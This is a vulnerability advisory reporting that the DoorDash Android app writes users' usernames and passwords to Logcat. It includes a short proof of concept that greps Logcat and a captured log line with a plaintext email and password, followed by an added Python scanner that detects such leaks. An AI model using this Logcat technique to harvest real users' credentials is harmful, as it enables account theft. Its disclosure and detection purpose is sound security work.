# Exploit Title: DoorDash Android App - Username/Password Logging
# Application: DoorDash
# Version: 11.0.2 ~ 11.5.2 (all versions we tested have this problem)
# Software Link: https://play.google.com/store/apps/details?id=com.dd.doordash
# Company: DoorDash
# Installs: 10,000,000+ (#1 in food category in Google Play)
# Impact: An attacker who can read the Logcat output can obtain DoorDash usernames and passwords
# Category: Mobile Apps
# Tested on: Android 9
---Description---
Usernames and passwords are written to the log during authentication, so anyone who can read Logcat can obtain a DoorDash user's ID and password. This is especially serious on old Android versions prior to Android Jelly Bean, where any installed app can read Logcat without any permission.
---Vendor feedback---
We have reported this issue, and they will fix it soon.
---PoC---
1. Log in to the DoorDash Android app:
   - Open the login UI
   - Enter credentials. Fake information is enough to reproduce the issue.
2. Search for the password in Logcat:
$ adb logcat | grep 'OkHttp'
10-07 16:09:34.498 10066 10201 D OkHttp : --> POST https://api.doordash.com/v2/auth/token/
10-07 16:09:34.498 10066 10201 D OkHttp : Content-Type: application/json; charset=UTF-8
10-07 16:09:34.498 10066 10201 D OkHttp : Content-Length: 109
10-07 16:09:34.498 10066 10201 D OkHttp : X-NewRelic-ID: XAUEWF5SGwEJUFhUDwcA
10-07 16:09:34.498 10066 10201 D OkHttp : {"client_id":"6086ebcbfb859ee3","email":"jaeho.lee@rice.edu","is_manual":true,"password":"MyPasswordIsHere!"}
10-07 16:09:34.498 10066 10201 D OkHttp : --> END POST (109-byte body)
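As an added check that is not part of the advisory: a small Python scanner that parses Logcat threadtime output, follows the OkHttp logging interceptor's `-->`/`<--` request and response blocks, and reports every credential field or header that reached the log in plaintext, the kind of pre-release test that would have caught this. The sensitive-name lists are assumptions, and the host, account and secret values in the sample are constructed placeholders.

```python
import json
import re
# Logcat "threadtime" line: MM-DD HH:MM:SS.mmm PID TID LEVEL TAG : message
LOGCAT_RE = re.compile(r"^\d\d-\d\d [\d:.]+\s+\d+\s+\d+\s+[VDIWEF]\s+(?P<tag>\S+)\s*:\s?(?P<msg>.*)$")
# OkHttp's logging interceptor opens a request with "--> METHOD url" and a response with "<-- CODE url"
ENDPOINT_RE = re.compile(r"^(?:-->|<--)\s+\S+\s+(?:\S+\s+)?(?P<url>https?://\S+)")
HEADER_RE = re.compile(r"^(?P<name>[A-Za-z][\w-]*):\s")
# Names that must never reach a log in plaintext (assumed list; extend for the app under review)
SENSITIVE_KEYS = {"username", "email", "password", "secret", "token", "access_token", "refresh_token", "otp"}
SENSITIVE_HEADERS = {"authorization", "cookie", "set-cookie", "x-api-key"}

def _leaves(obj, path=""):
    """Yield (dotted path, value) for each leaf of a JSON object; arrays are treated as leaves."""
    if isinstance(obj, dict):
        for key, value in obj.items():
            yield from _leaves(value, f"{path}.{key}" if path else key)
    else:
        yield path, obj

def find_credential_leaks(logcat_text, tag="OkHttp"):
    """Return [(endpoint, field)] for every sensitive header or JSON field logged under `tag`."""
    findings, endpoint = [], None
    for line in logcat_text.splitlines():
        m = LOGCAT_RE.match(line)
        if not m or m.group("tag") != tag:
            continue
        msg = m.group("msg").strip()
        if (ep := ENDPOINT_RE.match(msg)):
            endpoint = ep.group("url")  # a new request or response block starts here
        elif (h := HEADER_RE.match(msg)) and h.group("name").lower() in SENSITIVE_HEADERS:
            findings.append((endpoint, h.group("name")))
        elif msg[:1] in ("{", "["):  # a logged body; OkHttp prints it verbatim at Level.BODY
            try:
                body = json.loads(msg)
            except ValueError:
                continue
            for path, value in _leaves(body):
                if path.rsplit(".", 1)[-1].lower() in SENSITIVE_KEYS and value not in ("", None):
                    findings.append((endpoint, path))
    return findings

# Constructed sample modelled on the advisory's capture; host, e-mail and secrets are placeholders.
SAMPLE_LOGCAT = """\
10-07 16:09:34.498 10066 10201 D OkHttp : --> POST https://api.example.test/v2/auth/token/
10-07 16:09:34.498 10066 10201 D OkHttp : {"client_id":"0000","email":"user@example.test","is_manual":true,"password":"hunter2"}
10-07 16:09:35.012 10066 10201 D OkHttp : <-- 200 https://api.example.test/v2/auth/token/ (514ms)
10-07 16:09:35.012 10066 10201 D OkHttp : {"token":"eyJ-placeholder","expires_in":3600}
10-07 16:09:36.000 10066 10201 D OkHttp : --> GET https://api.example.test/v2/me/
10-07 16:09:36.000 10066 10201 D OkHttp : Authorization: Bearer eyJ-placeholder
"""
```

Run it over `adb logcat -d` output from a login session; an empty result is the expected state for a release build, where the interceptor level should be NONE or headers and bodies redacted.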
---Reporter---
Jaeho Lee (Jaeho.Lee@rice.edu)
Rice Computer Security Lab
Rice University